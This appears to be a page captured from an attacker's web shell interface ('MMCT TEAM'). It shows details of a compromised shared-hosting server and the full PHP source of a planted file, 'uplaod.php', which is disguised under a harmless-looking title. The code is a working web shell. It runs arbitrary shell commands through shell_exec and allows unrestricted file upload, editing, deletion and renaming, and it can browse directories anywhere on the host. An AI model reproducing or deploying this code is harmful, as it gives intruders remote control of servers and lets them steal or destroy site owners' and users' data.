MMCT TEAM
Server IP : 2a02:4780:3:2287:0:3736:a38e:8  /  Your IP : 216.73.217.17
Web Server : LiteSpeed
System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0777) :  /home/u926327694/domains/smsoft.in/public_html/att/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u926327694/domains/smsoft.in/public_html/att/../uplaod.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>html|jpg|png|pdf|doc|txt</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
            background-color: #f9f9f9;
        }
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
            background: #fff;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
            border-radius: 5px;
        }
        .nav-tabs {
            display: flex;
            gap: 10px;
            margin-bottom: 20px;
            border-bottom: 1px solid #ddd;
            padding-bottom: 10px;
        }
        .nav-tabs a {
            text-decoration: none;
            padding: 8px 16px;
            background: #f1f1f1;
            border-radius: 5px;
            color: #333;
        }
        .nav-tabs a.active {
            background: #007BFF;
            color: white;
        }
        form {
            display: flex;
            flex-direction: column;
            gap: 10px;
            margin-top: 15px;
        }
        input, textarea, select {
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ddd;
            border-radius: 5px;
        }
        input[type="submit"] {
            background-color: #007BFF;
            color: white;
            border: none;
            cursor: pointer;
        }
        input[type="submit"]:hover {
            background-color: #0056b3;
        }
        .output {
            background: #f1f1f1;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 5px;
            overflow-x: auto;
        }
        table {
            width: 100%;
            border-collapse: collapse;
        }
        th, td {
            text-align: left;
            padding: 8px;
            border-bottom: 1px solid #ddd;
        }
        th {
            background-color: #f2f2f2;
        }
        .danger-file {
            background-color: #ffe6e6;
        }
        .edit-btn, .delete-btn, .rename-btn {
            text-decoration: none;
            margin: 0 5px;
        }
        .edit-btn { color: green; }
        .delete-btn { color: red; }
        .rename-btn { color: orange; }
        hr {
            margin: 20px 0;
        }
    </style>
</head>
<body>
<div class="container">
    <h2>[html|jpg|png|pdf|doc|txt</h2>

    <?php
    session_start();
    
    // Helper function untuk format ukuran file
    function formatSizeUnits($bytes) {
        if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
        if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
        if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
        return $bytes . ' B';
    }
    
    // Helper function untuk validasi path
    function safe_join_path($base, $name) {
        $base = rtrim($base, '/\\');
        $name = ltrim($name, '/\\');
        return $base . DIRECTORY_SEPARATOR . $name;
    }
    
    // Helper function untuk generate CSRF token sederhana
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    
    function check_csrf() {
        if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
            $_SESSION['error'] = "CSRF token mismatch.";
            header("Location: " . strtok($_SERVER["REQUEST_URI"], '?'));
            exit;
        }
    }
    
    // Direktori aktif
    $current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
    if (!is_dir($current_dir)) $current_dir = getcwd();
    chdir($current_dir);
    
    // Tampilkan pesan session
    if (isset($_SESSION['message'])) {
        echo "<div class='output' style='color:green;'>✅ " . htmlspecialchars($_SESSION['message']) . "</div>";
        unset($_SESSION['message']);
    }
    if (isset($_SESSION['error'])) {
        echo "<div class='output' style='color:red;'>❌ " . htmlspecialchars($_SESSION['error']) . "</div>";
        unset($_SESSION['error']);
    }
    
    $dir_param = '&dir=' . urlencode($current_dir);
    ?>
    
    <div class="nav-tabs">
        <a href="?mode=shell<?php echo $dir_param; ?>" class="<?php echo (!isset($_GET['mode']) || $_GET['mode']=='shell') ? 'active' : ''; ?>">Shell Command</a>
        <a href="?mode=upload<?php echo $dir_param; ?>" class="<?php echo (isset($_GET['mode']) && $_GET['mode']=='upload') ? 'active' : ''; ?>">Upload File</a>
        <a href="?mode=files<?php echo $dir_param; ?>" class="<?php echo (isset($_GET['mode']) && $_GET['mode']=='files') ? 'active' : ''; ?>">File Manager</a>
    </div>
    
    <?php
    // ======================= SHELL COMMAND =======================
    if (!isset($_GET['mode']) || $_GET['mode'] == 'shell') {
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['command'])) {
            $command = escapeshellcmd($_POST['command']);
            echo "<h3>Command: " . htmlspecialchars($command) . "</h3>";
            echo "<div class='output'><pre>";
            $output = shell_exec($command . " 2>&1");
            echo htmlspecialchars($output);
            echo "</pre></div>";
        }
        ?>
        <form method="POST">
            <label for="command">Shell Command:</label>
            <input type="text" id="command" name="command" placeholder="e.g. ls -la" required>
            <input type="submit" value="Execute">
        </form>
        <hr>
        <p><strong>Current Directory:</strong> <?php echo htmlspecialchars($current_dir); ?></p>
        <?php
    }
    
    // ======================= UPLOAD FILE =======================
    if (isset($_GET['mode']) && $_GET['mode'] == 'upload') {
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload_file'])) {
            $target_file = basename($_FILES['upload_file']['name']);
            $target_path = $current_dir . DIRECTORY_SEPARATOR . $target_file;
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target_path)) {
                $_SESSION['message'] = "File uploaded: " . htmlspecialchars($target_file);
            } else {
                $_SESSION['error'] = "Upload failed.";
            }
            header("Location: ?mode=upload&dir=" . urlencode($current_dir));
            exit;
        }
        ?>
        <form method="POST" enctype="multipart/form-data">
            <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
            <label for="upload_file">Pilih file:</label>
            <input type="file" name="upload_file" id="upload_file" required>
            <input type="submit" value="Upload File">
        </form>
        <hr>
        <p><strong>Upload ke direktori:</strong> <?php echo htmlspecialchars($current_dir); ?></p>
        <a href="?mode=files<?php echo $dir_param; ?>">← Kembali ke File Manager</a>
        <?php
    }
    
    // ======================= FILE MANAGER =======================
    if (isset($_GET['mode']) && $_GET['mode'] == 'files') {
        // ---------- DELETE ----------
        if (isset($_GET['delete'])) {
            $target = basename($_GET['delete']);
            $full_path = $current_dir . DIRECTORY_SEPARATOR . $target;
            if (file_exists($full_path) && is_file($full_path)) {
                if (unlink($full_path)) {
                    $_SESSION['message'] = "Deleted: " . htmlspecialchars($target);
                } else {
                    $_SESSION['error'] = "Failed to delete: " . htmlspecialchars($target);
                }
            } else {
                $_SESSION['error'] = "File not found.";
            }
            header("Location: ?mode=files&dir=" . urlencode($current_dir));
            exit;
        }
        
        // ---------- RENAME (via POST) ----------
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'rename') {
            check_csrf();
            $old_name = basename($_POST['old']);
            $new_name = basename($_POST['new']);
            $old_path = safe_join_path($current_dir, $old_name);
            $new_path = safe_join_path($current_dir, $new_name);
            
            if (empty($new_name)) {
                $_SESSION['error'] = "New name cannot be empty.";
            } elseif (preg_match('/[\/\\\\:*?"<>|]/', $new_name)) {
                $_SESSION['error'] = "Invalid characters in filename.";
            } elseif (!file_exists($old_path)) {
                $_SESSION['error'] = "File/folder does not exist.";
            } elseif (file_exists($new_path)) {
                $_SESSION['error'] = "A file/folder with that name already exists.";
            } elseif (rename($old_path, $new_path)) {
                $_SESSION['message'] = "Renamed " . htmlspecialchars($old_name) . " → " . htmlspecialchars($new_name);
            } else {
                $_SESSION['error'] = "Rename failed.";
            }
            header("Location: ?mode=files&dir=" . urlencode($current_dir));
            exit;
        }
        
        // ---------- EDIT ----------
        if (isset($_GET['edit'])) {
            $edit_file = basename($_GET['edit']);
            $full_path = $current_dir . DIRECTORY_SEPARATOR . $edit_file;
            if (file_exists($full_path) && is_file($full_path) && is_readable($full_path)) {
                $content = file_get_contents($full_path);
                if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_content'])) {
                    if (file_put_contents($full_path, $_POST['new_content'])) {
                        $_SESSION['message'] = "Saved: " . htmlspecialchars($edit_file);
                        header("Location: ?mode=files&dir=" . urlencode($current_dir));
                        exit;
                    } else {
                        echo "<div class='output' style='color:red;'>❌ Write failed.</div>";
                    }
                }
                ?>
                <h3>Editing: <?php echo htmlspecialchars($edit_file); ?></h3>
                <form method="POST">
                    <textarea name="new_content" rows="15" style="width:100%; font-family:monospace;"><?php echo htmlspecialchars($content); ?></textarea>
                    <input type="submit" value="Save Changes">
                </form>
                <a href="?mode=files&dir=<?php echo urlencode($current_dir); ?>">← Back to File Manager</a>
                <?php
                exit;
            } else {
                echo "<div class='output' style='color:red;'>❌ Cannot edit file.</div>";
            }
        }
        
        // ---------- TAMPILAN FILE MANAGER (TANPA "NonNull") ----------
        echo "<h3>📁 File Manager - " . htmlspecialchars($current_dir) . "</h3>";
        echo "<a href='?mode=files&dir=" . urlencode(dirname($current_dir)) . "' class='edit-btn' style='display:inline-block; margin-bottom:15px;'>⬆️ Up One Level</a>";
        echo "&nbsp;&nbsp;|&nbsp;&nbsp;";
        echo "<a href='?mode=upload&dir=" . urlencode($current_dir) . "' class='edit-btn'>📤 Upload File ke direktori ini</a>";
        
        // Form rename (jika ada parameter rename_form)
        if (isset($_GET['rename_form'])) {
            $target = basename($_GET['rename_form']);
            $full_path = $current_dir . DIRECTORY_SEPARATOR . $target;
            if (file_exists($full_path)) {
                echo "<div class='output' style='margin-bottom:15px;'>";
                echo "<strong>Rename: " . htmlspecialchars($target) . "</strong><br>";
                echo "<form method='POST' action=''>";
                echo "<input type='hidden' name='action' value='rename'>";
                echo "<input type='hidden' name='csrf_token' value='" . $_SESSION['csrf_token'] . "'>";
                echo "<input type='hidden' name='old' value='" . htmlspecialchars($target) . "'>";
                echo "<label>New name: </label>";
                echo "<input type='text' name='new' value='" . htmlspecialchars($target) . "' required>";
                echo "<input type='submit' value='Rename'>";
                echo "</form>";
                echo "</div>";
            } else {
                echo "<div class='output' style='color:red;'>❌ File/folder not found.</div>";
            }
        }
        
        echo "<table>";
        echo "<tr><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>";
        
        $files = scandir($current_dir);
        foreach ($files as $file) {
            if ($file == '.' || $file == '..') continue;
            $full_path = $current_dir . DIRECTORY_SEPARATOR . $file;
            $is_dir = is_dir($full_path);
            $size = $is_dir ? '-' : filesize($full_path);
            $size_display = $is_dir ? '&lt;DIR&gt;' : formatSizeUnits($size);
            $modified = date("Y-m-d H:i:s", filemtime($full_path));
            
            $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
            $danger_exts = ['php', 'phtml', 'php3', 'php4', 'php5', 'shtml', 'pl', 'cgi', 'py', 'sh'];
            $row_class = in_array($ext, $danger_exts) ? 'danger-file' : '';
            
            echo "<tr class='$row_class'>";
            echo "<td>";
            if ($is_dir) echo "📁 ";
            else echo "📄 ";
            echo htmlspecialchars($file);
            echo "</td>";
            echo "<td>$size_display</td>";
            echo "<td>$modified</td>";
            echo "<td>";
            if ($is_dir) {
                echo "<a href='?mode=files&dir=" . urlencode($full_path) . "' class='edit-btn'>📂 Open</a> ";
                echo "<a href='?mode=files&rename_form=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='rename-btn'>✏️ Rename</a>";
            } else {
                echo "<a href='?mode=files&edit=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='edit-btn'>✏️ Edit</a> ";
                echo "<a href='?mode=files&rename_form=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='rename-btn'>🏷️ Rename</a> ";
                echo "<a href='?mode=files&delete=" . urlencode($file) . "&dir=" . urlencode($current_dir) . "' class='delete-btn' onclick='return confirm(\"Delete this file?\")'>🗑️ Delete</a>";
            }
            echo "</td>";
            echo "</tr>";
        }
        echo "</table>";
    }
    ?>
</div>
</body>
</html>

MMCT - 2023